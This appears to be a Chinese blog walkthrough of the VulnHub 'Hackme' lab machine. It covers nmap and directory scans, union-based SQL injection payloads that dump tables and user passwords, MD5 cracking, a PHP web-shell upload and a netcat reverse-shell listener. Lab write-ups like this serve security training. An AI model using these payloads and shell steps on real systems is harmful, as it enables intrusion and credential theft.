vulnhub-Hackme-隧道建立、SQL注入、详细解题、思路清晰。

vulnhub-Hackme-隧道建立、SQL注入、详细解题、思路清晰。

一、信息收集 2025.3.14 PM 12:18

1、主机发现

arp-scan -l

nmap -sn 192.168.66.0/24

2、端口扫描

复制代码
1、nmap --min-rate 10000 -p- 192.168.66.182 -oA port
查看所有开放端口
复制代码
2、map -sS -sV 192.168.66.182
附带服务版本信息,详细扫描

3、vuln扫描

复制代码
nmap --script=vuln -p 22,80 192.168.66.182
这里也是慢慢捡起来其他工具,这个可以扫描以往受到的攻击,扫描看一下

4、后台扫目录

复制代码
dirb http://192.168.66.182
dirsearch -u http://192.168.66.182/ -e * -i 200
nikto -h 192.168.66.182 -p 80
扫描一下目录

5、访问80端口

1、sql注入

这里一个弱口令admin、123456登录成功,我们看一下有什么功能吧

我们翻译一下是一个图书管理后台,我们还是一个管理员身份,这里万能语法可以生效,尝试一下有没有过滤吧 Ⅰ、判断是否存在sql注入

复制代码
OSINT' and 1=1#
OSINT' and 1=2#
这两段代码来判断是否存在sql注入,我们输入第二段代码返回异常或者无回显说明我们注入成功

或者我们使用'发现可以回显所有书名

Ⅱ、判断字段数

复制代码
OSINT' order by 4
这里也是判断了字段数
复制代码
OSINT' union select 1,2,3 -- +
确定显示位
使用 UNION 命令来查找其中存在的列数,这里到4就没有回显了,我们判断又3列

Ⅲ、查询数据库版本和存在的数据库,这里因为是又三个回显点

复制代码
OSINT' union select version(),database(),3#

这些基本信息都能爆出来,我们接着爆库

Ⅳ、爆列 ok,这里也是调试好了,这两条语法都可以查询到,这里应该也算是万能语法,只是把列数确定好,把表名爆出来就大差不差了。这两个语法貌似没什么区别

OSINT' union select group_concat(table_name),2,3 from information_schema.tables where table_schema="webapphacking"#

OSINT' union select (select group_concat(table_name)),2,3 from information_schema.tables where table_schema="webapphacking" -- +

这里一个books一个users,我们加下来吧这两个爆出来 Ⅴ、爆users表

OSINT' union select group_concat(column_name),2,3 from information_schema.columns where table_name="users" -- +

OSINT' union select group_concat(column_name),2,3 from information_schema.columns where table_name="users"#

这里我们只需要爆出user和pasword即可,或者其他表格也能爆出来

OSINT' union select group_concat(user),group_concat(pasword),3 from users#

这里我们就需要鉴定一下加密类型了

这里是md5加密,然后我们拿去解密尝试进行ssh登录

得到了一丢密码,拿去hydra爆破一下,失败了,我们拿这些账户登录一下这个端口,看看有没有其他信息

6、寻找突破口

这里原来是有用户名,而不是我们得到的user1,这次我们可以尝试hydra了

这里有个惊喜啊,文件上传太熟了,赶紧丢个后门测试测试

笑了,上传到upload了是吧,和我们之前的uploads文件夹呼应了,我们去uploads看一下什么情况

给爷整笑了,这里出现了一个png,我们上传一句话然后nc反连一下

2、后台目录

7、隧道建立

nc -lvp 6666

这次上传了php.png连接不到不知道是什么原因,但是php文件是可以连到的

我们修复一下shell

这里提权真的很垃圾啊,也可能是这个太简单了,主要是想不到这一点,这个touchmenot执行就提权了。

后续我也会出更多打靶文章,希望大家关注!谢谢

相关推荐
jiayou641 天前
KingbaseES 表级与列级加密完全指南
数据库·后端
GBASE2 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
xiezhr2 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
唐青枫3 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
吃糖的小孩3 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
笃行3504 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库
笃行3504 天前
金仓数据库物理备份实战:sys_rman 全流程演练与误覆盖抢救
数据库
笃行3504 天前
金仓数据库逻辑备份实战:从全库导出到 Schema 替换的完整闭环
数据库
SelectDB5 天前
阶跃星辰基于 SelectDB 构建 PB 级 Agent 可观测平台
大数据·数据库·aigc